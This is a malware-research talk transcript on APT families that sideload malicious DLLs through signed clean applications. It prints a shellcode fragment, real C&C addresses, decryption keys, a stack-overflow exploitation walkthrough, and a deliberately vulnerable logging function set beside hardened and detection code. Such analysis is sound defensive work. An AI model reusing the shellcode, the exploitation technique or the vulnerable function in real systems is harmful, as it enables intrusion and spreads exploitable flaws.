Hide and seek - how targeted attacks hide behind clean applications Szappanos Gábor

Szappanos Gábor, Principal Malware Researcher, Sophos

Honourable mentions:
- 2010: Stuxnet digitally signed drivers (stolen certificate)
- June 2012: Flame/Wiper (MD5 collision attack + abused Microsoft certificate)
- October 2012: Adobe-signed malware (compromised server)
- January 2013: TURKTRUST certificate abuse
- March 2013: Bit9-signed malware (stolen certificate)
- Certificates purchased by malware authors (Digital River, ...)

Classification initiative

See if APT samples cluster by:
- Shellcode techniques
- Encryption of the embedded EXE
- Generic detection of the dropped malware
- Connected C&C domains
- System activity

Typical Plugx infection scenario (figure slide)

Decoy document (figure slide)

CVE-2012-0158 (figure slide)

Stage 2 neighbourhood (figure slide)

Stage 2, two views (figure slide)

Stage 2 decoding (v. 3.0, 4.0): encrypted EXE (figure slide)

RAR SFX dropper (v. 3.0, 4.0) contains:
- Clean signed application
- Malware loader
- Encrypted payload

Stage 2 decoding (v. 6.0) (figure slide)

The final payload (http://www.contextis.com/files/plugx_-_payload_extraction_march_2013_1.pdf):
- Bytewise XOR (keystream from an LCG, Linear Congruential Generator) + LZNT compression
- DLL file; the MZ + PE header is overwritten with a GULP marker

Backdoor functions (function name: functionality):
- Disk: get drive information (type, free space); enumerate files; create directory; create/modify file; copy/delete/move/rename files; execute files
- KeyLog: log keystrokes to the file %ALLUSERSPROFILE%\SxS\NvSmart.hlp
- Nethood: enumerate shared network resources
- Netstat: set TCP connection state; enumerate UDP and TCP connections
- Option: lock workstation; logoff/reboot/shutdown workstation; display message box
- PortMap: perform port map
- Process: terminate process; enumerate processes and modules; get process and module information
- RegEdit: enumerate/create/delete registry entries
- Screen: capture screenshot
- Service: get service information; change service configuration; start service; control service; delete service
- Shell: create remote shell
- SQL: list SQL drivers; list SQL data sources; execute SQL command
- Telnet: create telnet connection

Simple components (v. 6.0):
- dw20.dll: stage 1 dropper; embedded EXE in the overlay (0xa00)
- 2.tmp: stage 2 dropper; embedded files: Sidebar.dll.doc, Sidebar.dll, Gadget.exe
- DLL search order hijacking, a clean application loading a malicious DLL: Gadget.exe (trusted process) loads Sidebar.dll (loader), which loads Sidebar.dll.doc (final payload)

Digitally signed clean loaders (figure slide)

DLL search order hijacking elsewhere:
- Tusmed (Plugx spinoff project): payload dropped to %WINDOWS%\ntshrui.dll, loaded by explorer.exe; payload dropped to %WINDOWS%\wdmaud.drv, loaded by explorer.exe
- Icefog: payload dropped to %WINDOWS%\wdmaud.drv, loaded by explorer.exe
- Yaludle (Plugx copycat): payload dropped to %WINDOWS%\msacm32.drv, loaded by explorer.exe
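An added detection check (my example, not from the talk) for the search-order hijacks on the two slides above: a DLL whose file name is one that normally resolves from System32, loaded instead from the hosting process's own directory (which Windows searches before System32), is flagged, and the same name from any other non-System32 path is flagged too. The known-name list and every path in the sample calls are constructed for illustration; a real deployment builds the list from a clean System32 inventory and feeds it image-load telemetry.

```c
/* Added example, not from the talk: classify one image-load event for the
 * search-order hijack pattern on slides 15 and 17. ASSUMED: the known-name
 * list (stand-in for a System32 baseline) and the paths in main(). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Names from slide 17. A real list comes from a clean System32 inventory. */
static const char *const KNOWN_SYSTEM_DLLS[] = {
    "ntshrui.dll", "wdmaud.drv", "msacm32.drv"
};

/* Case-insensitive compare of n bytes (Windows paths are case-insensitive). */
static int ieq_n(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

static const char *basename_win(const char *path)
{
    const char *p = strrchr(path, '\\');
    return p ? p + 1 : path;
}

/* Directory part length, without the final backslash. */
static size_t dirlen_win(const char *path)
{
    const char *p = strrchr(path, '\\');
    return p ? (size_t)(p - path) : 0;
}

enum { SIDELOAD_CLEAN = 0, SIDELOAD_APPDIR = 1, SIDELOAD_OTHER_DIR = 2 };

/* Which process loaded which DLL path; returns one of the codes above. */
int sideload_check(const char *process_image, const char *dll_path)
{
    const char *name = basename_win(dll_path);
    size_t nlen = strlen(name), i, known = 0;
    for (i = 0; i < sizeof KNOWN_SYSTEM_DLLS / sizeof *KNOWN_SYSTEM_DLLS; i++)
        if (nlen == strlen(KNOWN_SYSTEM_DLLS[i]) &&
            ieq_n(name, KNOWN_SYSTEM_DLLS[i], nlen)) { known = 1; break; }
    if (!known) return SIDELOAD_CLEAN;

    /* Resolved where it belongs: the directory itself is ...\System32. */
    size_t dl = dirlen_win(dll_path);
    if (dl >= 8 && ieq_n(dll_path + dl - 8, "system32", 8)
        && (dl == 8 || dll_path[dl - 9] == '\\'))
        return SIDELOAD_CLEAN;

    /* explorer.exe in C:\Windows pulling C:\Windows\ntshrui.dll: the DLL
     * sits in the process's own directory, first in the search order. */
    size_t pl = dirlen_win(process_image);
    if (pl == dl && ieq_n(process_image, dll_path, dl))
        return SIDELOAD_APPDIR;
    return SIDELOAD_OTHER_DIR;
}

int main(void)
{
    /* Constructed events, not real telemetry. */
    static const char *const events[][2] = {
        { "C:\\Windows\\explorer.exe", "C:\\Windows\\ntshrui.dll" },
        { "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ntshrui.dll" },
        { "C:\\Windows\\explorer.exe", "C:\\Users\\u\\AppData\\Local\\Temp\\wdmaud.drv" },
    };
    for (size_t i = 0; i < sizeof events / sizeof *events; i++)
        printf("%d  %s <- %s\n", sideload_check(events[i][0], events[i][1]),
               events[i][0], events[i][1]);
    return 0;
}
```

This rule catches the explorer.exe cases on slide 17 but says nothing about Gadget.exe loading Sidebar.dll from the dropper's directory (slide 15), because that DLL name is not a System32 resident; that case needs a different signal, such as a signed executable loading an unsigned DLL from a user-writable directory.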

BLame (a.k.a. Mgbot, Mgmbot)

Decoy document (figure slide)

CVE-2012-0158; seen in China, Myanmar, Korea. Encrypted Excel workbook with the hardcoded default password VelvetSweatshop (http://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/).

Shellcode anti-tracing trick (two figure slides)

Encrypted appended EXE: XOR with a 1-byte running key, then XOR with a 1-byte fixed key. Dropped to %TEMP%\Winword.exe.

Installation flow:
- Shellcode in the exploited document (embedded EXE in the OLE2 overlay)
- Winword.exe: temporary dropper; embedded: final payload and backup installer
- Copies of rundll32 and wscript
- Dropped files: AppMgmt.dll, vbstdcomm.nls, Odbc.txt
- Takes over an existing service: HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters -> ServiceDll

Main payload:
- Compiled from the LAME MP3 encoder source (http://sourceforge.net/projects/lame)
- Some versions use the UDT library (http://udt.sourceforge.net) for communication
- Additional malware export(s)
- ASCII and Unicode strings encrypted using DES ECB, decrypted on the fly, cleared after use
  - Key for ASCII strings: 82 C5 D3 59 2B 38 00 00
  - Key for Unicode strings: 5E 97 CC 42 8E CD 00 00
  - Key for API function names: 5B 5F CB 8D E5 F5 00 00
- C&C server names encrypted with bytewise XOR (0x58)
- Usual backdoor functions: create screenshot; get drive type (FAT, FAT32, NTFS, CDFS) and free space; enumerate files and directories and send the list to the server; rename files; create directory; delete file

Main payload versions:

Version   | PE/LAME timestamp | Exports                                  | DES keys | UDT | First seen | Servers
2.2       | 19/10/2011        | lame_set_out_sample, lame_get_out_sample | 3        | -   | 08/04/2013 | 202.146.217.229
2.22      | 17/02/2012        | lame_set_out_sample                      | 3        | -   | 31/05/2013 | 103.246.247.194
2.3 (TCP) | 19/03/2012        | lame_set_out_sample                      | 3        | -   | 26/04/2013 | forwork.my03.com
2.3 (UDP) | 06/06/2012        | lame_set_out_sample                      | 3        | +   | 07/12/2012 | 113.10.201.254, goodnewspaper.gicp.net, 115.126.3.214, goodnewspaper.3322.org
2.4 (UDP) | 19/01/2013        | lame_set_out_sample                      | 2        | +   | 06/05/2013 | 113.10.201.254, 113.10.201.250, 125.141.149.23, 125.141.149.46, 125.141.149.49, 58.64.129.149, goodnewspaper.3322.org, goodnewspaper.gicp.net

Informative string constants

General operation:
- Client RecvData Complete
- A File Search Task has start already!!!
- File Search Task Success
- File Search Task Failed, Please Check
- Upload Client Failed
- Upload Client Success
- Delete File Success
- Delete File Failed
- Rename File Success
- Rename File Failed
- Create Folder Success
- Create Folder Failed
- Global\VMM1002

Undocumented functionality:
- X:\Windows\System32\rundll32.exe
- X:\Windows\msacm32.drv
- arp -s %s 11-11-11-11-11-11 (2.4 UDP)

Junk:
- lsjkl

Unused string constants

Internal configuration (ASCII):
- 1a: kazafei
- 1b: 192.168.1.98
- 1c: 80

Junk (ASCII):
- 1f: #

Undocumented functionality:
- ASCII 1d: MagicMutex
- Unicode 15: D:\Resume.dll
- Unicode 16: D:\delete.dll
- Unicode 17: D:\delete2.dll

Unicode:
- 7: WINSTA0
- 14: AppMgmt
- 3a: @
- 52: Start

Simbot

CVE-2012-0158. Encrypted Excel workbook with the hardcoded default password VelvetSweatshop (http://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/).

Multi-staged shellcode dropper (figure slide)

Installation flow:
- Shellcode in the exploited document (embedded EXE in the OLE2 overlay)
- First stage dropper (embedded plain EXE)
- Intermediate dropper (embedded encrypted EXE)
- Installer (embedded encrypted components)
- Science.exe, registered for startup via HKLM\SYSTEM\CurrentControlSet\Services\NetWork Service\ImagePath and added to the DEP exclusion list (sysdm.cpl -> NoExecuteAddFileOptOutList). The DEP opt-out is necessary because the exploit that follows executes shellcode straight out of the process's command-line buffer, a data region.

Run key: HKLM\SYSTEM\CurrentControlSet\Services\NetWork Service\ImagePath = C:\Documents and Settings\All Users\NetWork\science.exe LLLLYIIII7QZAkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN2uNkXlMQJLePvbUPePJgW59t7kwOKDSPJgg5hh2ZezxFVXJg75xlrebuXbtKyWqUXp5FKfZvYPKwpEzTm7xosdLUO7w5zXLnN0dVNKO72eKLYKJs3ROEucKypdnkgEVP5PgpUPLKRVtLLKT6ELLKw6WxlKQnwPLKp6u6vYPOr8RUzRnkyHlKRs7LNkpTvzt8wsxSlIqEYLlK1bQ0wsZSNkSzFxVSjrk9aEkhcfrqLKsen8NmQmXdlMulNwwCJrkLnM5SO3rrpVvSZrNkxpVSiPKLnLlDKpptEWKqYR334rN0XkHtLKy [several kilobytes of alphanumeric shellcode, repeated across the slide's overlapping text boxes, omitted here] PC@

Logging

    char *write_log(int a1, char *Format, ...)
    {
        va_list va;       // [sp+200Ch] [bp+Ch]@1
        char *result;     // eax@1
        char Dest;        // [sp+0h] [bp-2000h]@2

        va_start(va, Format);
        result = Format;
        if ( Format )
        {
            result = (char *)vsprintf(&Dest, Format, va);
            if ( (unsigned int)result < 0x2000 )
                result = (char *)CLog::ADD_Log(g_Log, &Dest, result, a1);
        }
        return result;
    }

IDA's note on vsprintf: using vsprintf, there is no way to limit the number of characters written, which means that code using this function is susceptible to buffer overruns. Use _vsnprintf instead, or call _vscprintf to determine how large a buffer is needed. Note that the 0x2000 length check runs after the write, so it only decides whether the entry is logged, not whether the stack buffer overflows.

Exploitation

Log function epilogue:

    add esp, 2000h
    retn

The overwritten return address is 0x00404350, written into the command line as the bytes "PC@", which lands on:

    .text:00404350 pop ecx
    .text:00404351 retn

At that point the stack holds Param 1 (log entry ID) and Param 2 (address of the command line). pop ecx discards the log entry ID, and the second retn returns into the command line buffer itself, which begins with the alphanumeric shellcode:

    LLLLYIIII7QZAkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN2uNkXlMQJLePvbUPePJgW59t7kwOKDSPJgg5hh2ZezxFVXJg75xlrebuXbtKyWqUXp5FKfZvYPKwpEzTm7xosdLUO7w5zXLnN0dVNKO72eKLYKJs3
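As an added example (mine, not the vendor's source), the logging function from the slide above in the shape the decompiler shows, beside a hardened version that bounds the write and treats an entry that does not fit as an error. CLog::ADD_Log is replaced by a stand-in that only records the length, and the helper names are assumed. Since the slide shows the command line arriving as write_log's format argument, the hardened path also only ever logs untrusted text through "%s".

```c
/* Added example, mine rather than the vendor's source: write_log() as the
 * decompiler shows it (vsprintf into a fixed 0x2000-byte stack buffer, no
 * bound), beside a hardened version. CLog::ADD_Log is a stand-in that only
 * records the length; helper names are assumed. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF 0x2000

static size_t g_last_logged;                 /* what the stand-in saw */
static int add_log(const char *entry, size_t len, int id)
{
    (void)entry; (void)id;
    g_last_logged = len;
    return (int)len;
}

/* As decompiled. A formatted string of 0x2000 bytes or more runs off the end
 * of dest into the saved EBP and return address; the talk's sample puts "PC@"
 * (0x00404350, pop ecx / retn) there from the command line. The length check
 * comes after the write and so prevents nothing. Kept only for comparison;
 * never feed it untrusted input. */
int write_log_vulnerable(int id, const char *fmt, ...)
{
    char dest[LOG_BUF];
    va_list va;
    if (!fmt) return 0;
    va_start(va, fmt);
    int n = vsprintf(dest, fmt, va);         /* unbounded write */
    va_end(va);
    return (unsigned)n < LOG_BUF ? add_log(dest, (size_t)n, id) : n;
}

/* Hardened: vsnprintf bounds the write, and an entry that would not fit is
 * reported (-1) rather than silently truncated or overflowed. NULL fmt still
 * returns 0, as in the original. */
int write_log(int id, const char *fmt, ...)
{
    char dest[LOG_BUF];
    va_list va;
    if (!fmt) return 0;
    va_start(va, fmt);
    int n = vsnprintf(dest, sizeof dest, fmt, va);
    va_end(va);
    if (n < 0 || (size_t)n >= sizeof dest) return -1;
    return add_log(dest, (size_t)n, id);
}

/* The slide shows the command line arriving as the format argument. Text the
 * attacker controls must only travel through "%s"; a bounded write alone
 * still leaves a format-string bug. */
int log_untrusted(int id, const char *text)
{
    return write_log(id, "%s", text);
}

/* 1 when a command line long enough to overflow the original is rejected. */
int long_entry_rejected(void)
{
    char cmdline[LOG_BUF + 0x100];
    memset(cmdline, 'A', sizeof cmdline - 1);
    cmdline[sizeof cmdline - 1] = '\0';
    return log_untrusted(7, cmdline) == -1;
}

int main(void)
{
    printf("short entry logged: %d bytes\n", log_untrusted(1, "science.exe started"));
    printf("oversized entry rejected: %s\n", long_entry_rejected() ? "yes" : "no");
    return 0;
}
```

Returning an error rather than truncating is a deliberate choice: a log line silently cut at 8 KiB can hide exactly the oversized argument an investigator would want to see, so the caller should decide whether to split it or record the length separately.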

Shellcode from the command line:
- Encoded with Metasploit's alpha_mixed encoder (which is why the command line is all alphanumeric)
- Unusual API resolver (SHL(3) + XOR hash)
- Decrypts and loads the main payload file (Config.dat)

Main payload:
- Decrypted and loaded in memory
- Connects to 59.188.23.121 (port 8001 or 8433)
- Communication is zlib compressed
- Loads its config from HKLM\SOFTWARE\Microsoft\Windows\Help -> Config and from the file %ALLUSERSPROFILE%\NetWork\t1.dat

Exploited application: downloader component
- 4 different variations identified
- All 4 are vulnerable to the exploit
- All have the same version info:
  - Verified: Signed
  - Signing date: 07:20 23/02/2012
  - Publisher:
  - Description: DownLoad Microsoft??????? (non-Latin characters lost in transcription)
  - Product: DownLoad????
  - Version: 1, 0, 0, 1
  - File version: 10, 3, 19, 1

Installation flow:
- Shellcode in the exploited document (embedded EXE in the OLE2 overlay)
- First stage dropper (embedded plain EXE)
- Intermediate dropper (embedded encrypted EXE)
- Installer (embedded encrypted components)
- Science.exe (trusted process) with DDVCtrlLib.dll and DDVEC.dll (clean libraries) and Config.dat (final payload)

Conclusion: not everything that looks clean, acts clean or is clean is innocent.

Questions? gabor.szappanos@sophos.com

Sophos Ltd. All rights reserved.